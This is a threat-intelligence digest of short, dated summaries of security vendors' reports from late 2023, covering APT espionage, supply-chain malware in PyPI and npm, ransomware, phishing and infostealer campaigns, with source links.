- ToddyCat started its malicious activity back in 2020. This very advanced APT group is responsible for attacks against high-profile organizations in Europe and Asia. In their blog, Securelist researchers explain the group’s new toolset, the malware used to steal and exfiltrate data, and the techniques used by this group to move laterally and conduct espionage operations.
Source:
https://securelist.com/toddycat-keep-calm-and-check-logs/110696/
—
- Intel Source:
- Checkmarx
- Intel Name:
- Latest_supply_chain_attack
- Date of Scan:
- 2023-10-12
- Impact:
- LOW
- Summary:
- Last month, a threat actor known as “kohlersbtuh15” attempted to attack the open-source community by uploading a series of malicious packages to the PyPI package manager. It appeared that the attacker targeted developers using Aliyun services (Alibaba Cloud), Telegram, and AWS.
Source:
https://checkmarx.com/blog/users-of-telegram-aws-and-alibaba-cloud-targeted-in-latest-supply-chain-attack/
https://blog.phylum.io/cloud-provider-credentials-targeted-in-new-pypi-malware-campaign/
—
- Intel Source:
- ASEC
- Intel Name:
- Hexadecimal_Notation_Addresses_Install_ShellBot_DDoS_Malware
- Date of Scan:
- 2023-10-12
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have found that the ShellBot malware, which is being deployed on poorly maintained Linux SSH servers, has a different way of spreading. The threat actor now uses a hexadecimal value instead of a standard IP address as the download URL to install ShellBot, but the general procedure is still the same.
—
- Intel Source:
- ASEC
- Intel Name:
- Distributing_Infostealer_with_Abnormal_Certificate
- Date of Scan:
- 2023-10-11
- Impact:
- LOW
- Summary:
- Malware employing strange certificates has been spreading at a rapid rate lately. Malware frequently assumes the appearance of legitimate certificates. In this instance, however, the malware inserted the certificate information at random, leaving unusually long strings in the Subject Name and Issuer Name fields.
—
- Intel Source:
- Krebs on Security
- Intel Name:
- The_phishing_scams_targeting_U_S_Postal_Service_customers
- Date of Scan:
- 2023-10-11
- Impact:
- LOW
- Summary:
- Recently, a rise in phishing scams targeting U.S. Postal Service customers has been observed. Krebs on Security analysts concluded that there is an extensive SMS phishing operation that tries to steal personal and financial data by spoofing the USPS, as well as postal services in at least a dozen other countries.
Source:
https://krebsonsecurity.com/2023/10/phishers-spoof-usps-12-other-natl-postal-services/
—
- Intel Source:
- Cyble
- Intel Name:
- The_deployment_of_Mythic_Athena_Agent
- Date of Scan:
- 2023-10-11
- Impact:
- LOW
- Summary:
- Cyble researchers recently observed a new spear phishing email targeting a leading Russian semiconductor supplier. The hackers were taking advantage of a Remote Code Execution (RCE) vulnerability, identified as CVE-2023-38831, to deliver their payload on compromised systems.
—
- Intel Source:
- CISA
- Intel Name:
- AvosLocker_Ransomware_Update
- Date of Scan:
- 2023-10-11
- Impact:
- HIGH
- Summary:
- The FBI and CISA released an update to the AvosLocker advisory today to distribute known indicators of compromise, tactics, techniques, and procedures (TTPs), and detection methods associated with the AvosLocker variant identified through FBI investigations as recently as May 2023.
—
- Intel Source:
- Ciberdefensa
- Intel Name:
- The_distribution_of_new_spotted_AgentTesla_Infostealer
- Date of Scan:
- 2023-10-11
- Impact:
- LOW
- Summary:
- ASEC has discovered the AgentTesla Infostealer that was distributed through an email in the form of a malicious BAT file.
—
- Intel Source:
- AT&T
- Intel Name:
- An_increase_usage_of_phishing_emails_containing_malicious_QR
- Date of Scan:
- 2023-10-11
- Impact:
- LOW
- Summary:
- Over the last couple of months, AT&T SOC analysts observed an increase in the use of phishing emails containing malicious QR codes. As an example, one customer victimized by a phishing attempt provided the AT&T analysts with an email that had been circulated to several of its internal users.
—
- Intel Name:
- Targets_on_unpatched_tagDiv_plugin
- Date of Scan:
- 2023-10-10
- Impact:
- LOW
- Summary:
- The Sucuri research team observed new waves of Balada malware injections on websites that were actively using tagDiv themes. Sucuri shared their examination of these waves of the ongoing massive Balada Injector campaign. Additionally, they provided the technical details of the injected scripts found in each wave, exploring their functionality and the potential dangers they pose to site administrators.
—
- Intel Source:
- ASEC
- Intel Name:
- Infostealer_Distributing_via_Spam_Email
- Date of Scan:
- 2023-10-10
- Impact:
- LOW
- Summary:
- ASEC researchers have spotted the AgentTesla Infostealer being distributed via an email in the form of a malicious BAT file. When the BAT file is executed, it employs a fileless method to run AgentTesla (EXE) without creating the file on the user’s PC. The blog post explains the distribution process, from the spam email to the final binary (AgentTesla), along with related techniques.
—
- Intel Source:
- Symantec
- Intel Name:
- An_Unknown_Threat_Actor_Targeting_Several_Taiwanese_Organizations
- Date of Scan:
- 2023-10-10
- Impact:
- LOW
- Summary:
- Targeting businesses in Taiwan’s manufacturing, IT, and biomedical industries, a previously unidentified advanced persistent threat (APT) group employed proprietary malware and other openly accessible tools. Organizations in Vietnam, the United States, and a Pacific Islands government agency all seem to have been targeted as part of this operation. The activity started in February 2023 and was ongoing until at least May 2023.
—
- Intel Source:
- Fortinet
- Intel Name:
- RCE_Campaign_Hacks_Routers_Into_Botnets
- Date of Scan:
- 2023-10-10
- Impact:
- LOW
- Summary:
- A campaign called IZ1H9 has intensified the development of malware to target a variety of unpatched routers and IoT devices and add them to a growing botnet used to perform targeted DDoS attacks. FortiGuard Labs researchers discovered the campaign, which recently added 13 new payloads that took advantage of vulnerabilities in Yealink Device Management, Zyxel devices, TP-Link Archer, Korenix Jetwave, and Totolink routers as well as known vulnerabilities in D-Link devices, Netis wireless routers, Sunhillo SureLine, and Geutebruck IP cameras.
—
- Intel Source:
- Akamai
- Intel Name:
- New_Magecart_Campaign_Exploits_404_Pages
- Date of Scan:
- 2023-10-10
- Impact:
- LOW
- Summary:
- Large companies in the food and retail industries are among the many websites that a Magecart web skimming campaign is targeting, according to the Akamai Security Intelligence Group. This campaign stands out due to its three sophisticated concealment strategies, one of which had never been seen before and which presents particular difficulties for identification and mitigation (specifically, modifying the website’s normal 404 error page to hide malicious code).
Source:
https://www.akamai.com/blog/security-research/magecart-new-technique-404-pages-skimmer
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- Harvesting_of_Credentials_For_NetScaler_Gateway
- Date of Scan:
- 2023-10-09
- Impact:
- LOW
- Summary:
- Attackers were using the CVE-2023-3519 vulnerability to target unpatched NetScaler Gateways in September 2023 and inject a malicious script into the HTML code of the authentication web page in order to capture user credentials. The effort is yet another illustration of how cybercriminals’ interest in credentials has grown. According to the 2023 X-Force cloud threat report, stolen credentials were used in 67% of cloud-related incident response engagements.
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0006_Group_Using_SmokeLoader_Malware
- Date of Scan:
- 2023-10-09
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified at least four waves of cyberattacks carried out by the UAC-0006 group using the SmokeLoader malware. Legitimate compromised email addresses are used to send the emails, and SmokeLoader is delivered to computers in several ways.
—
- Intel Source:
- https://any.run/cybersecurity-blog/analyzing-snake-keylogger/
- Intel Name:
- Examining_the_Snake_Keylogger
- Date of Scan:
- 2023-10-09
- Impact:
- LOW
- Summary:
- Researchers from AnyRun have examined the Snake Keylogger. It is information-stealing malware written in the .NET programming language. It was identified in November 2020 and goes by the names Snake, 404 Keylogger, and 404KeyLogger. The Snake Keylogger collects the victim’s saved passwords, clipboard contents, keystrokes, and screenshots, among other pieces of information.
Source:
https://any.run/cybersecurity-blog/analyzing-snake-keylogger/
—
- Intel Source:
- Cyble
- Intel Name:
- The_exploit_of_a_vulnerability_in_WinRAR
- Date of Scan:
- 2023-10-07
- Impact:
- LOW
- Summary:
- Cyble researchers observed a RAR archive file on VirusTotal on October 3rd. The file exploits a WinRAR vulnerability (CVE-2023-38831) and could be encountered through adult websites or fake adult sites. In this malware campaign, the vulnerability is used to deliver various malicious payloads to the victim’s system, aiming to infect it with various malware types, such as Apanyan Stealer, The Murk-Stealer, and AsyncRAT.
—
- Intel Source:
- eSentire
- Intel Name:
- Attacks_Involving_an_Adversary_in_the_Middle_Have_Increased
- Date of Scan:
- 2023-10-06
- Impact:
- LOW
- Summary:
- Researchers from eSentire have noticed an uptick in adversary-in-the-middle (AitM) phishing attacks since mid-September 2023. AitM phishing attacks use social engineering to trick end users into clicking on dangerous links in emails. Then, data is proxied or routed through infrastructure under the control of the attacker, which results in the theft of user credentials, including session cookies and Multi-Factor Authentication (MFA) codes that would allow access to various accounts. This access has been used to carry out Business Email Compromise (BEC) attacks.
Source:
https://www.esentire.com/security-advisories/increase-in-adversary-in-the-middle-phishing-attacks
—
- Intel Source:
- Nsfocus
- Intel Name:
- New_wave_of_Mirai_Botnet
- Date of Scan:
- 2023-10-06
- Impact:
- MEDIUM
- Summary:
- The NSFOCUS threat hunting system observed new botnet variant families tied to Mirai: hailBot, kiraiBot, and catDDoS. They are very active and have already spread widely, making them a growing threat. The article discloses the technical details of these three new Mirai variants and the data monitored by the global threat hunting system.
—
- Intel Source:
- eSentire
- Intel Name:
- Examining_Uses_of_ProjFUD_Injector_and_HTML_Smuggling_to_Deploy_AsyncRAT
- Date of Scan:
- 2023-10-06
- Impact:
- LOW
- Summary:
- Researchers from eSentire have determined that the VBS file in question is malicious; it contains the code that retrieves AsyncRAT. The user received a phishing email with an .htm file attached. This method, known as HTML smuggling, was previously used by malware strains including Qakbot and AsyncRAT.
—
- Intel Source:
- SOC Radar
- Intel Name:
- Diving_Deep_into_Dark_Pink_APT_Group
- Date of Scan:
- 2023-10-06
- Impact:
- LOW
- Summary:
- SOCRadar researchers have delved into the intricate details of the Dark Pink APT Group, shedding light on their campaigns, targets, and the security measures one can adopt to safeguard against malicious endeavors.
Source:
https://socradar.io/apt-profile-dark-pink-apt-group/
—
- Intel Source:
- Sentinelone
- Intel Name:
- Analysis_of_LostTrust_Ransomware
- Date of Scan:
- 2023-10-06
- Impact:
- LOW
- Summary:
- The ransomware has been examined by SentinelOne experts, who have provided a high-level technical breakdown of the areas where various ransomware families and their modes of operation overlap. In addition to analyzing LostTrust payload behavior, they contrast its artifacts with those from the SFile and Mindware families.
—
- Intel Source:
- welivesecurity
- Intel Name:
- DinodasRAT_Hits_a_Governmental_Organization_in_Guyana
- Date of Scan:
- 2023-10-05
- Impact:
- MEDIUM
- Summary:
- As part of Operation Jacana, a cyber espionage operation, a government agency in Guyana has been attacked. The activity involved a spear-phishing attack that resulted in the deployment of a previously undocumented implant named DinodasRAT, which was built in C++. ESET discovered the activity in February 2023.
Source:
https://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/
—
- Intel Source:
- Talos
- Intel Name:
- The_distribute_of_Ransom_Knight_malware_by_Qakbot_actors
- Date of Scan:
- 2023-10-05
- Impact:
- MEDIUM
- Summary:
- Talos is confident that, even though the FBI took down Qakbot infrastructure in August, the threat actors behind Qakbot remain active and started a new campaign just before the takedown, distributing a variant of Cyclops/Ransom Knight ransomware along with the Remcos backdoor. Talos observed this new activity by connecting the metadata in the LNK files used in the new campaign to the machines used in previous Qakbot campaigns.
Source:
https://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- A_cyber_espionage_campaign_with_use_of_a_variant_of_HyperBro_loader
- Date of Scan:
- 2023-10-05
- Impact:
- LOW
- Summary:
- EclecticIQ analysts detected a cyber espionage campaign. The threat actors used a HyperBro loader variant with a Taiwan Semiconductor Manufacturing (TSMC) lure. It targeted the semiconductor industry in Mandarin/Chinese-speaking East Asian regions (Taiwan, Hong Kong, Singapore).
—
- Intel Source:
- ReversingLabs
- Intel Name:
- A_Typosquatting_Operation_Using_NPM_to_Distribute_r77_Rootkit
- Date of Scan:
- 2023-10-05
- Impact:
- LOW
- Summary:
- Researchers from ReversingLabs have discovered a fresh supply chain attack that targets the npm platform. The “typosquatting” campaign first surfaced in August, pushing a malicious package called node-hide-console-windows that downloaded a Discord bot which facilitated installation of the r77 open source rootkit.
Source:
https://www.reversinglabs.com/blog/r77-rootkit-typosquatting-npm-threat-research
—
- Intel Source:
- Trend Micro
- Intel Name:
- Exposing_Infection_Methods_Across_Supply_Chains_and_Codebases
- Date of Scan:
- 2023-10-05
- Impact:
- LOW
- Summary:
- Researchers from Trend Micro examined case studies in which threat actors copied legitimate GitHub repositories (such as Binance-trading-bot, Crypto-clipper, Telegram-mass-dm, USDT-Sweeper, Discord-boost-tool, and others written in Python 3), trojanized them, and infected them with malicious code while strategically stuffing their repository description sections with keywords to increase their visibility in GitHub searches.
—
- Intel Source:
- Cyble
- Intel Name:
- RMS_Phishing_campaign_comeback
- Date of Scan:
- 2023-10-04
- Impact:
- LOW
- Summary:
- The Cyble Research team discovered a phishing campaign targeting Russian users, in which threat actors (TAs) created phishing websites that duplicated popular apps like ExpressVPN, WeChat, and Skype. None of these applications are accessible in Russia due to nationwide restrictions.
Source:
https://cyble.com/blog/rms-tools-sneaky-comeback-phishing-campaign-mirroring-banned-applications/
—
- Intel Source:
- Checkmarx
- Intel Name:
- The_Emergence_of_Recurring_Python_Threat
- Date of Scan:
- 2023-10-04
- Impact:
- LOW
- Summary:
- Researchers from Checkmarx have seen that from the beginning of April 2023, an attacker has been continuously deploying hundreds of malicious packages under different usernames, racking up close to 75,000 downloads. With changes from plain-text to encryption, multilevel obfuscation, and secondary disassembly payloads, the attacker’s progression is clear.
Source:
https://checkmarx.com/blog/the-evolutionary-tale-of-a-persistent-python-threat/
—
- Intel Source:
- Domain Tools
- Intel Name:
- US_Postal_Service_Smishing_Campaign_analysis
- Date of Scan:
- 2023-10-04
- Impact:
- LOW
- Summary:
- Recently, a spike in phishing and smishing emails and text messages was observed in campaigns targeting the US Postal Service (USPS) as an institution,
—
- Intel Source:
- Menlo Security
- Intel Name:
- EvilProxy_Phishing_Attack_Strikes_Indeed
- Date of Scan:
- 2023-10-04
- Impact:
- LOW
- Summary:
- Menlo Labs have discovered a phishing campaign that targets senior-level executives in a variety of businesses, but especially those in the banking and financial services, insurance, property management, and manufacturing sectors.
Source:
https://www.menlosecurity.com/blog/evilproxy-phishing-attack-strikes-indeed/
—
- Intel Source:
- Rapid7
- Intel Name:
- WS_FTP_Server_critical_vulnerabilities_in_the_wild
- Date of Scan:
- 2023-10-03
- Impact:
- MEDIUM
- Summary:
- The vulnerabilities were first disclosed by Progress Software, who published an advisory about them; two of them are critical (CVE-2023-40044 and CVE-2023-42657). Of these, CVE-2023-40044 appears to be a .NET deserialization vulnerability, and Rapid7 confirmed that it is exploitable with a single HTTPS POST request and a pre-existing ysoserial.net gadget. As of September 30, Rapid7 has observed multiple instances of WS_FTP exploitation in the wild and provided the details of this activity in the Observed Attacker Behavior section of their blog.
Source:
https://www.rapid7.com/blog/post/2023/09/29/etr-critical-vulnerabilities-in-ws_ftp-server/
—
- Intel Source:
- Fortinet
- Intel Name:
- A_discovery_of_several_malicious_packages_hidden_in_NPM
- Date of Scan:
- 2023-10-03
- Impact:
- MEDIUM
- Summary:
- Over the last couple of months, the Fortinet team discovered several malicious packages hidden in NPM. Such packages have been discovered across various ecosystems, e.g. PyPI and NPM. The blog looks at some of these packages, grouping them based on similar styles of code or functions. Every NPM package that was discovered aims to steal sensitive data, such as system or user information, via a webhook or file-sharing link.
Source:
https://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm
—
- Intel Source:
- Zscaler
- Intel Name:
- A_new_Malware_threat_BunnyLoader
- Date of Scan:
- 2023-10-02
- Impact:
- LOW
- Summary:
- Zscaler threat researchers observed a new Malware-as-a-Service offering, “BunnyLoader,” which has been sold on various forums. BunnyLoader has many capabilities, such as downloading and executing a second-stage payload, stealing browser credentials and system information, and much more.
Source:
https://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service
—
- Intel Source:
- Cyble
- Intel Name:
- PurpleFox_campaign_resurfaces_again
- Date of Scan:
- 2023-10-02
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) came across a Word document file that spreads via spam email, employing an infection method for disseminating PurpleFox malware.
Source:
https://cyble.com/blog/purplefox-resurfaces-via-spam-emails-a-look-into-its-recent-campaign/
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_Murk_Stealer_an_open_source_stealer_details
- Date of Scan:
- 2023-10-02
- Impact:
- LOW
- Summary:
- Cyfirma shared a full analysis report of “The-Murk-Stealer,” an open-source stealer. Their report details “The-Murk-Stealer,” a malicious tool that can discreetly infiltrate systems to collect sensitive information.
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_CL0P_ransomware_group_recent_activity
- Date of Scan:
- 2023-09-30
- Impact:
- MEDIUM
- Summary:
Source:
https://unit42.paloaltonetworks.com/cl0p-group-distributes-ransomware-data-with-torrents/
—
- Intel Source:
- Security Affairs
- Intel Name:
- Johnson_Controls_International_suffered_a_ransomware_attack
- Date of Scan:
- 2023-09-29
- Impact:
- MEDIUM
- Summary:
- Johnson Controls International announced that it suffered a massive ransomware attack that encrypted many of the company’s devices, including VMware ESXi servers, impacting the operations of the company and its subsidiaries.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Ad_Serving_Malicious_Content_Inside_Bing_AI_Chatbot
- Date of Scan:
- 2023-09-29
- Impact:
- LOW
- Summary:
- Researchers from Malwarebytes have discovered a method through which consumers looking for software downloads can be persuaded to visit fraudulent websites and download malware straight from a Bing Chat conversation.
—
- Intel Source:
- Trend Micro
- Intel Name:
- APT34_Launches_Phishing_Attack_With_New_Malware
- Date of Scan:
- 2023-09-29
- Impact:
- MEDIUM
- Summary:
- Researchers from Trend Micro have detected and tracked the APT34 advanced persistent threat (APT) group using a new malware variant, comparable to the SideTwist backdoor, in conjunction with a phishing campaign. Following the campaign, the group went after a victim in Saudi Arabia using a bogus license registration form purporting to come from an African government agency.
Source:
https://www.trendmicro.com/en_us/research/23/i/apt34-deploys-phishing-attack-with-new-malware.html
—
- Intel Source:
- Huntress
- Intel Name:
- Analyses_of_Netscaler_exploitation
- Date of Scan:
- 2023-09-29
- Impact:
- LOW
- Summary:
- Huntress performs daily threat hunting across monitored endpoints for suspicious activity not previously identified through existing detections. Recently, Huntress researchers observed strange processes in several monitored environments. These reflected reconnaissance activity typical of adversary tradecraft: execution of built-in commands such as whoami.exe, tasklist with various flags, ipconfig, and ping.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Analyzes_of_a_Lazarus_attack_on_employees_of_an_aerospace_company
- Date of Scan:
- 2023-09-29
- Impact:
- LOW
- Summary:
- ESET researchers have observed a Lazarus attack on an aerospace company in Spain, in which the group deployed several tools, most notably a previously undocumented backdoor that ESET named LightlessCan.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Sample_of_Infostealer_malware_that_is_in_the_wild
- Date of Scan:
- 2023-09-29
- Impact:
- LOW
- Summary:
- An ISC.SANS researcher spotted and analyzed a new “Infostealer” malware in the wild. He is concerned about how people are still storing passwords, and whether they are still kept in plain-text files.
—
- Intel Source:
- Securelist
- Intel Name:
- Reports_on_new_malwares_and_loaders
- Date of Scan:
- 2023-09-29
- Impact:
- LOW
- Summary:
- Securelist published a report on the new ASMCrypt malware (related to the DoubleFinger loader) and also published reports on new versions of the Lumma stealer and the Zanubis Android banking trojan.
Source:
https://securelist.com/crimeware-report-asmcrypt-loader-lumma-stealer-zanubis-banker/110512/
—
- Intel Source:
- Cyber Geeks
- Intel Name:
- Diving_Deep_into_Brute_Ratel_C4_Payloads
- Date of Scan:
- 2023-09-28
- Impact:
- LOW
- Summary:
- Brute Ratel C4 is a red team and adversary simulation framework that serves as an alternative to Cobalt Strike. Researchers have presented a technical investigation of a Brute Ratel badger/agent that does not use all of the framework’s most recent features.
Source:
https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads-part-2/
—
- Intel Source:
- Checkmarx
- Intel Name:
- Dependabot_carrying_malicious_code
- Date of Scan:
- 2023-09-28
- Impact:
- LOW
- Summary:
- Checkmarx recently observed that their scanners detected atypical commits carrying malicious code in hundreds of GitHub repositories. The commit messages were crafted by threat actors to appear as automated Dependabot contributions in the commit history, in an attempt to disguise the malicious activity.
Source:
https://checkmarx.com/blog/surprise-when-dependabot-contributes-malicious-code/
—
- Intel Source:
- Resecurity
- Intel Name:
- New_Move_of_Ransomware_Ransomed_vc_Operators
- Date of Scan:
- 2023-09-28
- Impact:
- LOW
- Summary:
- Following the recent data leak from Sony, the same ransomware syndicate, Ransomed.vc, has named a new victim, this time the largest Japanese telecommunications company, NTT Docomo.
—
- Intel Source:
- Symantec
- Intel Name:
- Budworm_APT_Group_Attacks_Government_and_Telecoms_Organizations
- Date of Scan:
- 2023-09-28
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have discovered that the Budworm advanced persistent threat (APT) group is still actively developing its toolkit. Additionally, it was determined that Budworm was targeting an Asian government and a Middle Eastern telecom company with an upgraded version of one of its main tools.
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_stealer_called_Exela
- Date of Scan:
- 2023-09-28
- Impact:
- LOW
- Summary:
- Cyble researchers recently came across a new stealer called “Exela”. Exela is a Python-based open-source stealer capable of stealing a wide range of sensitive information from compromised systems.
Source:
https://cyble.com/blog/exela-stealer-spotted-targeting-social-media-giants/
—
- Intel Source:
- Fortinet
- Intel Name:
- A_Spearphishing_Campaign_Exploits_the_Azerbaijan_Armenia_Conflict
- Date of Scan:
- 2023-09-28
- Impact:
- LOW
- Summary:
- Last month, FortiGuard Labs spotted a malicious memo pretending to be from the president of a company in Azerbaijan and targeting the management teams of associated businesses. When opened, the memo downloaded malware meant to collect basic information from its targets. The memo is in HTML format and uses HTML smuggling to automatically deliver a password-protected archive.
—
- Intel Source:
- DR. Web
- Intel Name:
- Hackers_Exploiting_Openfire_Flaw_to_Encrypt_Servers
- Date of Scan:
- 2023-09-28
- Impact:
- LOW
- Summary:
- Openfire messaging servers have a high-severity vulnerability that hackers are actively using to install cryptominers and encrypt servers with ransomware. A popular Java-based open-source chat (XMPP) server called Openfire has been downloaded 9 million times and is frequently used for private, cross-platform chat communications.
—
- Intel Source:
- Group-IB
- Intel Name:
- ShadowSyndicate_a_new_RaaS_threat_actor
- Date of Scan:
- 2023-09-27
- Impact:
- MEDIUM
- Summary:
- Group-IB researchers have identified a threat actor dubbed ShadowSyndicate using the same Secure Shell (SSH) fingerprint on many servers. It is a threat actor that collaborates with other ransomware organizations and programs’ affiliates. ShadowSyndicate employs an “off-the-shelf” toolbox for its attacks, which includes Cobalt Strike, IcedID, and Sliver.
—
- Intel Source:
- NSFOCUS
- Intel Name:
- AtlasCross_Hackers_Using_American_Red_Cross_as_Phishing_Lure
- Date of Scan:
- 2023-09-27
- Impact:
- LOW
- Summary:
- A new APT hacking outfit called AtlasCross has been identified by NSFOCUS researchers. AtlasCross targets organizations using phishing lures that pretend to be the American Red Cross in order to spread backdoor malware. NSFOCUS assesses that a new APT attacker, with a high level of technical proficiency and a careful attack mindset, is responsible for this new attack method. In this instance, phishing activity was observed as part of the attacker’s focused attack on particular targets and served as its primary method of in-domain penetration.
—
- Intel Source:
- ASEC
- Intel Name:
- Unmasking_the_Threat_Impersonating_the_National_Tax_Service
- Date of Scan:
- 2023-09-26
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Emergency Response Center (ASEC) has identified a concerning threat involving deceptive LNK files posing as the National Tax Service. This threat primarily targets Korean users through email-based distribution. When executed, the LNK file triggers a series of actions, including downloading additional malicious files and compromising user information. Quasar RAT and Amadey malware have been identified as the ultimate payloads.
—
- Intel Source:
- Any Run
- Intel Name:
- The_examination_of_Lu0Bot_malware_malicious_activity
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- Any.Run analysts caught some malicious activity that triggered their interest: a sample written in Node.js. While it initially appeared to be a regular DDoS bot, it turned out to be a lot more complex.
—
- Intel Source:
- Group-IB
- Intel Name:
- A_detection_of_cryptojacking_campaign_on_a_popular_educational_resource
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- Group-IB’s analyst team observed and provided details for a cryptojacking campaign on a popular educational resource using Group-IB Managed XDR.
—
- Intel Source:
- ASEC
- Intel Name:
- Unveiling_the_Installation_Process_of_Cryptocurrency_CoinMiners
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency Response Center (ASEC) has revealed the process of cryptocurrency CoinMiner installation on compromised systems. Threat actors employ PowerShell scripts, primarily “nodejssetup-js.exe,” to exploit system resources. Malicious behaviors include code decoding, process injection, and crypto mining. Detecting this threat relies on behavior detection via AhnLab EDR. Vigilance, endpoint security, and detailed analysis are essential for defense against this evolving threat.
—
- Intel Source:
- Proofpoint
- Intel Name:
- A_New_Malware_Called_ZenRAT
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- Researchers from Proofpoint have discovered a brand-new piece of malware dubbed ZenRAT that spreads through fake Bitwarden installation packages. The malware will divert users of other hosts to a safe website and primarily targets Windows users.
Source:
https://www.proofpoint.com/us/blog/threat-insight/zenrat-malware-brings-more-chaos-calm
—
- Intel Source:
- Mandiant
- Intel Name:
- Ramps_Up_Its_Spying_Activities
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- Researchers from Mandiant have discovered that APT29’s activity and focus on Ukraine accelerated in the first half of 2023 as Kyiv began its counteroffensive, highlighting the SVR’s crucial role in gathering intelligence on the current crucial stage of the war.
Source:
https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing
—
- Intel Source:
- Resecurity
- Intel Name:
- The_expansion_of_a_Smishing_Triad_attack
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- This month, the “Smishing Triad” attack expanded its footprint to the UAE. Resecurity researchers have identified domain names that closely resemble those used by the group in their previous campaigns. Threat actors registered the majority of these UAE-focused domains with Gname.com Pte. Ltd.
—
- Intel Source:
- Recorded Future
- Intel Name:
- Chinese_Hackers_TAG_74_Targeting_Organizations_in_South_Korea
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- Recorded Future researchers have identified that a multi-year Chinese state-sponsored cyber espionage campaign has been observed targeting South Korean academic, political, and government organizations.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2023-0919.pdf
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- Ukraines_Military_Targeted_in_STARK_VORTEX_with_MerlinAgent_Malware
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- Securonix Threat Research has uncovered an ongoing cyber attack campaign, dubbed STARK#VORTEX, that is specifically targeting Ukraine’s military. Orchestrated by the threat group UAC-0154, this campaign utilizes sophisticated techniques to evade detection. The attackers use a Microsoft Help file with an embedded obfuscated JavaScript code as a lure document, disguised as a manual for Pilot-in-Command (PIC) Drones, to deliver the MerlinAgent malware. The PowerShell-based malware is heavily obfuscated and downloads a payload from a remote server, giving attackers full control over compromised systems.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Hackers_Using_Gelsemium_to_Attack_Asian_Government
- Date of Scan:
- 2023-09-25
- Impact:
- MEDIUM
- Summary:
- Researchers from Palo Alto have discovered that attacks on a Southeast Asian government that took place over the course of six months in 2022 and 2023 were carried out by a stealthy advanced persistent threat (APT) tracked as Gelsemium. It included a variety of uncommon tools and methods that the threat actor used to establish a covert presence and gather information on private IIS servers owned by a Southeast Asian government organization.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Mustang_Panda_Using_ShadowPad_and_TONESHELL_Variant
- Date of Scan:
- 2023-09-25
- Impact:
- MEDIUM
- Summary:
- The attackers carried out a cyberespionage campaign with the goal of acquiring confidential documents and information while establishing a tenacious and covert foothold. The activity, which took place between the second and third quarters of 2021 and 2023, used a variety of technologies to conduct reconnaissance, steal credentials, keep access, and carry out post-compromise actions.
Source:
https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/
—
- Intel Source:
- fortinet
- Intel Name:
- The_Retch_and_S_H_O_ransomware_overview
- Date of Scan:
- 2023-09-25
- Impact:
- LOW
- Summary:
- FortiGuard Labs collected data on new ransomware variants that attracted attention within their datasets and the OSINT community. This ransomware report from FortiGuard covered the Retch and S.H.O ransomware.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-retch-and-sho
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Deadglyph_on_Stealth_Falcon_in_Middle_East
- Date of Scan:
- 2023-09-25
- Impact:
- LOW
- Summary:
- Researchers from ESET have found Deadglyph, a powerful backdoor that the famed Stealth Falcon gang utilized for Middle Eastern espionage. With the use of a machine-specific key, the essential parts are encrypted. Additional modules obtained from its C&C server are used to implement conventional backdoor commands.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Alloy_Taurus_Aims_to_Remain_Unnoticed
- Date of Scan:
- 2023-09-25
- Impact:
- MEDIUM
- Summary:
- According to reports, the intrusion set connected to Alloy Taurus started in early 2022 and persisted until 2023, utilizing unusual tactics and evading security measures for long-term persistence and reconnaissance. These attacks, which take place in six waves, take advantage of security holes in Microsoft Exchange Servers to deploy web shells, which act as a conduit to deliver additional payloads, including two previously unidentified .NET backdoors called Zapoa and ReShell, which allow remote command execution and data collection.
Source:
https://unit42.paloaltonetworks.com/alloy-taurus-targets-se-asian-government/
—
- Intel Source:
- The DFIR Report
- Intel Name:
- From_ScreenConnect_to_Hive_Ransomware
- Date of Scan:
- 2023-09-25
- Impact:
- LOW
- Summary:
- Researchers from the DFIR Report have seen a threat actor use an RMM tool as their first point of access, which led to a slightly bungled Hive ransomware deployment. An executable file disguised as a legitimate document made up the initial payload. Researchers believe that this campaign was most likely sent as an email with a link that, when clicked, downloaded the executable.
Source:
https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/
—
- Intel Source:
- Saudiresta
- Intel Name:
- APT34_group_new_phishing_attack
- Date of Scan:
- 2023-09-23
- Impact:
- LOW
- Summary:
- The Iranian threat group APT34 has been observed launching a new phishing attack that used a variant of a backdoor called SideTwist. APT34, also known by the names Cobalt Gypsy, Hazel Sandstorm (formerly Europium), Helix Kitten, and OilRig, has a track record of targeting telecommunications, government, defense, oil and financial services verticals in the Middle East.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Analyzing_the_Turla_APT_Group_Activities
